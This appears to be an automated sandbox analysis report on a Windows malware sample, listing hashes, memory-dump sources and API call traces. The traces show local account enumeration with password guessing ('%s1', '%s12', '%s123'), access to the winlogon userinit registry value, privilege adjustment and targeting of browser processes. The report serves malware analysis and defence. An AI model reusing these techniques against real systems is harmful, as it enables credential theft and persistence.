                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 00403717
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,75C8DB30), ref: 0040371E
                                                                                                                                                                                                              • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                              • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F3
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403812
                                                                                                                                                                                                              • wcsstr.MSVCRT ref: 00403845
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004038DB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040390C
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 00403913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040391A
                                                                                                                                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0040394B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039A7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039B7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004039BA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039CD
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039D0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039DD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004039E0
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreePointerValidatewcsstr$AllocCloseCreateHandleInitModuleNameReadSizeVariantWrite_snwprintfmemset
                                                                                                                                                                                                              • String ID: 00-->$<Actions
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,?,?,75C8DB30), ref: 00403060
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00403080
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404418,00000000,00000001,00404208,?), ref: 004030A7
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030BF
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030DA
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004030F8
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00403116
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040319C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031A8
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004031AE
                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(004036D6), ref: 004031ED
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00404F4C), ref: 00403396
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033BB
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 004033D9
                                                                                                                                                                                                                • Part of subcall function 00402F70: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,004031C1,00404F38), ref: 00402F78
                                                                                                                                                                                                                • Part of subcall function 00402F70: HeapAlloc.KERNEL32(00000000,?,004031C1,00404F38), ref: 00402F7F
                                                                                                                                                                                                                • Part of subcall function 00402F70: SysAllocString.OLEAUT32(004031C1), ref: 00402FA0
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403486
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0040348C
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00403492
                                                                                                                                                                                                              • API ID: Variant$Clear$Init$Alloc$HeapInitializeString$CreateDecrementInstanceInterlockedProcessSecurity
                                                                                                                                                                                                              • String ID: cmd.exe
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,75C8DB30), ref: 00401EC6
                                                                                                                                                                                                              • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,75C8DB30), ref: 00401EE2
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                              • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,77305430,00000000,?), ref: 00401923
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                              • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                              • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                              • String ID: %s1$%s12$%s123
                                                                                                                                                                                                              • API String ID: 1588441251-2882894844
                                                                                                                                                                                                              • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnfw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2220832649
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,761DE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,761DE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,75C8DB30), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction ID: 5661f09ceaf7dd6985fdec3726855c2d4268d42b19af7d6053b1c23afd98fc53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 846a4d946463fd889953915331e6662e7c5f164914c665561fc20ec9cc3dfa3e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3001DB716003049BC714ABBAAC829D6B79DDF89745300813AEB19E32E2C635DC488BAD
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              • Opcode ID: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction ID: 972971b60caab807df67e590393efcb4d1d6a3813561f3a0b79f06a1da21d750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffa31b1aa032498b302ac31cd015523b39c7887b3f6490af6b71b29526461ec5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69E01AB06203049BEB10AFB1AD09A5637DC9FC47413048032BB09F21A1DA38C8248B6D

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:0.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:40
                                                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012E3300: #680.SHELL32 ref: 012E3325
                                                                                                                                                                                                                • Part of subcall function 012E3300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012E3344
                                                                                                                                                                                                                • Part of subcall function 012E3300: PathAddBackslashA.SHLWAPI(?), ref: 012E3351
                                                                                                                                                                                                                • Part of subcall function 012E3300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 012E336E
                                                                                                                                                                                                                • Part of subcall function 012E3300: _snprintf.MSVCRT(?,00000104,01325748,000FF0FF), ref: 012E3389
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 012E33A7
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,01339B58,00000104), ref: 012E33FC
                                                                                                                                                                                                                • Part of subcall function 012E3300: RegCloseKey.ADVAPI32(00000000), ref: 012E340A
                                                                                                                                                                                                                • Part of subcall function 01305A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 01305A7F
                                                                                                                                                                                                                • Part of subcall function 01305A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 01305AB8
                                                                                                                                                                                                                • Part of subcall function 01305A50: _snprintf.MSVCRT(9E2B3F07a,00000104,01325748,?,?), ref: 01305B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,01339D68), ref: 012F6CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(01339D68), ref: 012F6CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012F6CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 012F6CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 012F6D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 012F6D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0132FB68), ref: 012F6D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 012F6D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F6DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012F6DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012F6DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F6DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F3530,00000000,00000000,00000000), ref: 012F6E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F7DD0,00000000,00000000,00000000), ref: 012F6E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F8080,00000000,00000000,00000000), ref: 012F6EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,9E2B3C2Da), ref: 012F6ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F6EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 012F6F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(9E2B3C2Da,00000006,00000010,00000000,00000000,00000000,00000000), ref: 012F6F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F6F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0132FB80), ref: 012F6F49
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F79D0,00000000,00000000,00000000), ref: 012F6F5B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6F6B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6F7C
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: memset.MSVCRT(?,00000000,0000040C,00000000,00000000), ref: 012E6E00
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 012E6E1C
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: CreateThread.KERNEL32(00000000,00000000,012E6A90,00000000,00000000,00000000,774D0F10,?,00000000,00000000), ref: 012E6E78
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,774D0F10,?,00000000,00000000), ref: 012E6EA0
                                                                                                                                                                                                                • Part of subcall function 012E6DE0: CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 012E6EB8
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F6970,00000000,00000000,00000000), ref: 012F6F91
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6FA1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F6FB2
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F54B0,00000000,00000000,00000000,9E2B3F61a), ref: 012F6FDC
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012F6FF0
